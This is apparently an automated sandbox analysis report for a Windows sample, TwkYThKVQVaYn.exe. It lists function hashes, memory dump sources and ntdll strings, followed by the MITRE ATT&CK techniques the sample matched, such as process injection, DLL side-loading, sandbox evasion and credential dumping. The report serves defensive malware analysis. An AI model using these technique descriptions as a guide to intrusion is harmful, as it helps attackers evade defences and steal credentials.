API String ID:
Opcode ID: 7892c90d646759d20725f6c037c335d6758216ac379880f1768ac323f0248b6c
Instruction ID: 79287c3ca02d812d0b7a5f4f61b1a68340c8ffca92d5f0f913a983c11d29156c
Opcode Fuzzy Hash: 7892c90d646759d20725f6c037c335d6758216ac379880f1768ac323f0248b6c
Instruction Fuzzy Hash: 07C0C032148230CCD2002B3CC8B08D83F70FEA3300715803F8200010A2C8380819C96F

Function 0540A349 Relevance: .0, Instructions: 11COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2331846094.0000000005400000.00000040.00000800.00020000.00000000.sdmp, Offset: 05400000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_5400000_TwkYThKVQVaYn.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cd3e943a195b6e4824e89a592a8eb7284c2d1a46e5a39172203a0a73f9ba8157
Instruction ID: dd2ca2a45abfd76f942e63888b08895a599a856608e5c2d220e3db34001b62d1
Opcode Fuzzy Hash: cd3e943a195b6e4824e89a592a8eb7284c2d1a46e5a39172203a0a73f9ba8157
Instruction Fuzzy Hash: 5EB02B2304C109EF6120E470240B4523FC480040403004191ED02536434A310E1040A2

Function 0540C5C8 Relevance: .0, Instructions: 9COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2331846094.0000000005400000.00000040.00000800.00020000.00000000.sdmp, Offset: 05400000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_5400000_TwkYThKVQVaYn.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8f0e6681e0f401fa473f2a799319a863b71133a1645001a2df1dfb9368367563
Instruction ID: c72507417b349bec6a90f13f74aa7e9fec28d514883cf35a59f4d7fdb8698513
Opcode Fuzzy Hash: 8f0e6681e0f401fa473f2a799319a863b71133a1645001a2df1dfb9368367563
Instruction Fuzzy Hash: BFC08035440004D9E7417790845485677747FD4300F45C413D104460F0DB319015EF42

Function 05409DC8 Relevance: .0, Instructions: 9COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2331846094.0000000005400000.00000040.00000800.00020000.00000000.sdmp, Offset: 05400000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_5400000_TwkYThKVQVaYn.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 88232110427ff286b587f26c6a60665badc3d570c4373658103c717bc17c4c2b
Instruction ID: 46947bbe6462a9bbbf54a6a399d5bd7514a713d7d94977a5bd6e7ec6e6eabdc1
Opcode Fuzzy Hash: 88232110427ff286b587f26c6a60665badc3d570c4373658103c717bc17c4c2b
Instruction Fuzzy Hash: 79C09B39185100EFD751FB55C998DE5BBE6FF95300755DCA7624446071CA31DC1EEB01

Function 0540A860 Relevance: .0, Instructions: 9COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2331846094.0000000005400000.00000040.00000800.00020000.00000000.sdmp, Offset: 05400000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_5400000_TwkYThKVQVaYn.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 09f50cb3fc565ba458ad2f7d8f00812f41b36f45b8dffc07bfdbe7f566124d1e
Instruction ID: 62a7f6506734d19b885fb7f075b59f36857229b508413b5e394677d888ac70de
Opcode Fuzzy Hash: 09f50cb3fc565ba458ad2f7d8f00812f41b36f45b8dffc07bfdbe7f566124d1e
Instruction Fuzzy Hash: 78B0112308CB0EC03800E0BB20A80F83A0F0000A2823C3EB38A0F000E008332AA3C2AB

Function 0540CF0C Relevance: .0, Instructions: 8COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2331846094.0000000005400000.00000040.00000800.00020000.00000000.sdmp, Offset: 05400000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_5400000_TwkYThKVQVaYn.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d63393bee03ef1846805caaad3e88dc094565610e95c78cdb4ef2ac62a211b96
Instruction ID: 464fe6e4c194a785869b097fa4776f25f8338f135449310feadae06cd0a8a9d9
Opcode Fuzzy Hash: d63393bee03ef1846805caaad3e88dc094565610e95c78cdb4ef2ac62a211b96
Instruction Fuzzy Hash: 7CB092662D8200E7A00466A888949AAA9A1AFA2701B20AA2A2304100A4C439982AA51B

Analysis Process: TwkYThKVQVaYn.exePID: 6636, Parent PID: 3552COMMON

Execution Graph

Execution Coverage:	0%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	5
Total number of Limit Nodes:	1

Executed Functions

Function 011C2C0A Relevance: 1.5, APIs: 1, Instructions: 8
libraryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL(011DFD4F,000000FF,00000024,01276634,00000004,00000000,?,-00000018,7D810F61,?,?,01198B12,?,?,?,?), ref: 011C2C24

Memory Dump Source

Source File: 0000000F.00000002.2568536920.0000000001176000.00000040.00001000.00020000.00000000.sdmp, Offset: 01150000, based on PE: true

Associated: 0000000F.00000002.2568536920.0000000001150000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.2568536920.0000000001157000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.2568536920.00000000011D0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.2568536920.00000000011D6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.2568536920.0000000001212000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.2568536920.0000000001273000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.2568536920.0000000001279000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_1150000_TwkYThKVQVaYn.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 62599f371aa306ec3fab32d35960573db7fd628a6b0a69ceafc273b19a8874c4
Instruction ID: bdc0dbe846a975e7cebff4f6a6507c02b87ab3cb998b1761fa62cbb6fbe56fa1
Opcode Fuzzy Hash: 62599f371aa306ec3fab32d35960573db7fd628a6b0a69ceafc273b19a8874c4
Instruction Fuzzy Hash: 0AB09B719015D5C6DA15E7A44708717791077D0701F25C065D2030641F4738C1D1E276

Function 011C2B60 Relevance: 1.5, APIs: 1, Instructions: 4
libraryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL(011F0DBD,?,?,?,?,011E4302), ref: 011C2B6A

Memory Dump Source

Source File: 0000000F.00000002.2568536920.0000000001176000.00000040.00001000.00020000.00000000.sdmp, Offset: 01150000, based on PE: true

Associated: 0000000F.00000002.2568536920.0000000001150000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.2568536920.0000000001157000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.2568536920.00000000011D0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.2568536920.00000000011D6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.2568536920.0000000001212000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.2568536920.0000000001273000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.2568536920.0000000001279000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_1150000_TwkYThKVQVaYn.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: da173bf847d935c84a3bbf18d7cc32829601613df7c660ceb41b7bb5d719c80e
Instruction ID: 1fa837aa741d1e1e33eae37a04eb7f571862644d69e7d78882d37966da9d2894
Opcode Fuzzy Hash: da173bf847d935c84a3bbf18d7cc32829601613df7c660ceb41b7bb5d719c80e
Instruction Fuzzy Hash: 5690026520241003410971584514616401A97E0201B55C021E1015590DC62589916226

Function 011C2DF0 Relevance: 1.5, APIs: 1, Instructions: 4
libraryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL(011FE73E,0000005A,0125D040,00000020,00000000,0125D040,00000080,011E4A81,00000000,-00000001,-00000001,00000002,00000000,?,-00000001,011CAE00), ref: 011C2DFA

Memory Dump Source

Source File: 0000000F.00000002.2568536920.0000000001176000.00000040.00001000.00020000.00000000.sdmp, Offset: 01150000, based on PE: true

Associated: 0000000F.00000002.2568536920.0000000001150000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.2568536920.0000000001157000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.2568536920.00000000011D0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.2568536920.00000000011D6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.2568536920.0000000001212000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.2568536920.0000000001273000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.2568536920.0000000001279000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_1150000_TwkYThKVQVaYn.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 6b454817d9cbf4caa480fdc7273c9d9e1f7015e48ed4b1df7ab72c5c17bca6b3
Instruction ID: 10f5023dafbd75a6c93424c35efb9070117c1a3715903d67ebfa6f485c7db155
Opcode Fuzzy Hash: 6b454817d9cbf4caa480fdc7273c9d9e1f7015e48ed4b1df7ab72c5c17bca6b3
Instruction Fuzzy Hash: 3F90023520141413D11571584604707001997D0241F95C412E0425558DD7568A52A222

Function 011C2C70 Relevance: 1.5, APIs: 1, Instructions: 4
libraryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL(0117FB34,000000FF,?,-00000018,?,00000000,00004000,00000000,?,?,011D7BE5,00001000,00004000,000000FF,?,00000000), ref: 011C2C7A

Memory Dump Source

Source File: 0000000F.00000002.2568536920.0000000001176000.00000040.00001000.00020000.00000000.sdmp, Offset: 01150000, based on PE: true

Associated: 0000000F.00000002.2568536920.0000000001150000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.2568536920.0000000001157000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.2568536920.00000000011D0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.2568536920.00000000011D6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.2568536920.0000000001212000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.2568536920.0000000001273000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.2568536920.0000000001279000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_1150000_TwkYThKVQVaYn.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 83ca26cf003013b23479e1b4b8f545e72c28fe348ce848828effd64b07eac9cc
Instruction ID: d41869fc8749cd7b5704d2e3bca042a7fc5061ce87a51b42991f201e683db864
Opcode Fuzzy Hash: 83ca26cf003013b23479e1b4b8f545e72c28fe348ce848828effd64b07eac9cc
Instruction Fuzzy Hash: DD90023520149802D1147158850474A001597D0301F59C411E4425658DC79589917222

Function 011C35C0 Relevance: 1.5, APIs: 1, Instructions: 4
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 011C35CA

Memory Dump Source

Source File: 0000000F.00000002.2568536920.0000000001176000.00000040.00001000.00020000.00000000.sdmp, Offset: 01150000, based on PE: true

Associated: 0000000F.00000002.2568536920.0000000001150000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.2568536920.0000000001157000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.2568536920.00000000011D0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.2568536920.00000000011D6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.2568536920.0000000001212000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.2568536920.0000000001273000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.2568536920.0000000001279000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_1150000_TwkYThKVQVaYn.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: ee05a24cfcae0d1909b27ff0708d1370073a3aa8039f52e50b35c742aae2679d
Instruction ID: d2937d0265d4de630469f33fbf60ff095eb1325efff43d668267c2e8bbe913b3
Opcode Fuzzy Hash: ee05a24cfcae0d1909b27ff0708d1370073a3aa8039f52e50b35c742aae2679d
Instruction Fuzzy Hash: 4090023560551402D10471584614706101597D0201F65C411E0425568DC7958A5166A3

Function 0042DC3D Relevance: 1.3, Strings: 1, Instructions: 47
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

!, xrefs: 0042DC70

Memory Dump Source

Source File: 0000000F.00000002.2567660175.000000000042D000.00000040.00000400.00020000.00000000.sdmp, Offset: 0042D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_42d000_TwkYThKVQVaYn.jbxd

Similarity

API ID:
String ID: !
API String ID: 0-2657877971
Opcode ID: b51832c13fcb2c175c5dadbecfa49a2de6ebf20e3803e27a60d02e879f77dac4
Instruction ID: c67b5eab7d0ef7db4ed4eef514b5f7c26ea96159c7986010962ecddc6e226d29
Opcode Fuzzy Hash: b51832c13fcb2c175c5dadbecfa49a2de6ebf20e3803e27a60d02e879f77dac4
Instruction Fuzzy Hash: F901F9B1D002145AEF64EBA5DC52FDDB778AF14304F4046DAE90CA2181EF796788CF58

Function 0042DC43 Relevance: 1.3, Strings: 1, Instructions: 44
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

!, xrefs: 0042DC70

Memory Dump Source

Source File: 0000000F.00000002.2567660175.000000000042D000.00000040.00000400.00020000.00000000.sdmp, Offset: 0042D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_42d000_TwkYThKVQVaYn.jbxd

Similarity

API ID:
String ID: !
API String ID: 0-2657877971
Opcode ID: 0743d4f26046a5680c78f24da68605d395031e817ba136b4aafe8bed19de446e
Instruction ID: a61b46438b3ae5ddd1412b450dc0800e73feb6ce147427082fa11820a05b89be
Opcode Fuzzy Hash: 0743d4f26046a5680c78f24da68605d395031e817ba136b4aafe8bed19de446e
Instruction Fuzzy Hash: 4201B9B1D0021856EB64EB95DD52FDDB3B8AF04304F4046DAA50CA2181FF7867988B59

Non-executed Functions

Function 0119A250 Relevance: 9.2, APIs: 1, Strings: 4, Instructions: 404
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

RtlpFindActivationContextSection_CheckParameters, xrefs: 011E79D0, 011E79F5
SsHd, xrefs: 0119A3E4
SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 011E79FA
SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 011E79D5

Memory Dump Source

Source File: 0000000F.00000002.2568536920.0000000001176000.00000040.00001000.00020000.00000000.sdmp, Offset: 01150000, based on PE: true

Associated: 0000000F.00000002.2568536920.0000000001150000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.2568536920.0000000001157000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.2568536920.00000000011D0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.2568536920.00000000011D6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.2568536920.0000000001212000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.2568536920.0000000001273000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.2568536920.0000000001279000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_1150000_TwkYThKVQVaYn.jbxd

Similarity

API ID:
String ID: RtlpFindActivationContextSection_CheckParameters$SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx.$SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx.$SsHd
API String ID: 0-929470617
Opcode ID: d40d40f21a13c0ba70bf7ac7e9fd359654420af40fc2bf9d7b42c029b5fddb74
Instruction ID: 8b73135df8ba18e6ebc6b030646585a5852ee15d59cb3eb0b7d1d4cb259beb5c
Opcode Fuzzy Hash: d40d40f21a13c0ba70bf7ac7e9fd359654420af40fc2bf9d7b42c029b5fddb74
Instruction Fuzzy Hash: 59E1C4706047018FEB2DCE68D488B6ABBE1AF84314F194A2DF975CB2D1D731D949CB82

Function 01204755 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 121timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 01204809

Strings

Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 01204888
minkernel\ntdll\ldrredirect.c, xrefs: 01204899
LdrpCheckRedirection, xrefs: 0120488F

Memory Dump Source

Source File: 0000000F.00000002.2568536920.00000000011D6000.00000040.00001000.00020000.00000000.sdmp, Offset: 01150000, based on PE: true

Associated: 0000000F.00000002.2568536920.0000000001150000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.2568536920.0000000001157000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.2568536920.0000000001176000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.2568536920.00000000011D0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.2568536920.0000000001212000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.2568536920.0000000001273000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.2568536920.0000000001279000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_1150000_TwkYThKVQVaYn.jbxd

Similarity

API ID: DebugPrintTimes
String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
API String ID: 3446177414-3154609507
Opcode ID: 5b43511dfeab5f0bc44f7e1b183252c987719ea330ca9d0bb9a0be93751d44eb
Instruction ID: bcaa9145c50f7bee2a6292d0d9a30b8d1fda5ab39b806896a909076bb6c2090e
Opcode Fuzzy Hash: 5b43511dfeab5f0bc44f7e1b183252c987719ea330ca9d0bb9a0be93751d44eb
Instruction Fuzzy Hash: 3541D632A246928FDB27EE18D841A277BE4EF89650B05875DEF44972A3D330D900CB81

Function 0117C070 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 46timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 0117C0B4
RtlDebugPrintTimes.NTDLL ref: 011DD623
RtlDebugPrintTimes.NTDLL ref: 011DD651

Strings

$, xrefs: 0117C07C

Memory Dump Source

Source File: 0000000F.00000002.2568536920.0000000001176000.00000040.00001000.00020000.00000000.sdmp, Offset: 01150000, based on PE: true

Associated: 0000000F.00000002.2568536920.0000000001150000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.2568536920.0000000001157000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.2568536920.00000000011D0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.2568536920.00000000011D6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.2568536920.0000000001212000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.2568536920.0000000001273000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.2568536920.0000000001279000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_1150000_TwkYThKVQVaYn.jbxd

Similarity

API ID: DebugPrintTimes
String ID: $
API String ID: 3446177414-3993045852
Opcode ID: 45d0f8e90c96c6059d2d7bc8bb865c70c682fcec3b0137cd72d75ba5e1996664
Instruction ID: 9181450f75e3ff78e621a09c980af54060fbbd8dd9d81fee101b93959828eb55
Opcode Fuzzy Hash: 45d0f8e90c96c6059d2d7bc8bb865c70c682fcec3b0137cd72d75ba5e1996664
Instruction Fuzzy Hash: 62110C32904218EFDF19AFA4F84869D7B72FF44765F108519F926672D0CB716A50CB80

Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically may require being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Container: Container Creation, File: File Creation, File: File Modification, Process: Process Creation, Scheduled Job: Scheduled Job Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may circumvent mechanisms designed to control elevate privileges to gain higher-level permissions. Most modern systems contain native elevation control mechanisms that are intended to limit privileges that a user can perform on a machine. Authorization has to be granted to specific users in order to perform tasks that can be considered of higher risk. An adversary can perform several methods to take advantage of built-in control mechanisms in order to escalate privileges on a system.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Modification, Windows Registry: Windows Registry Key Modification
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

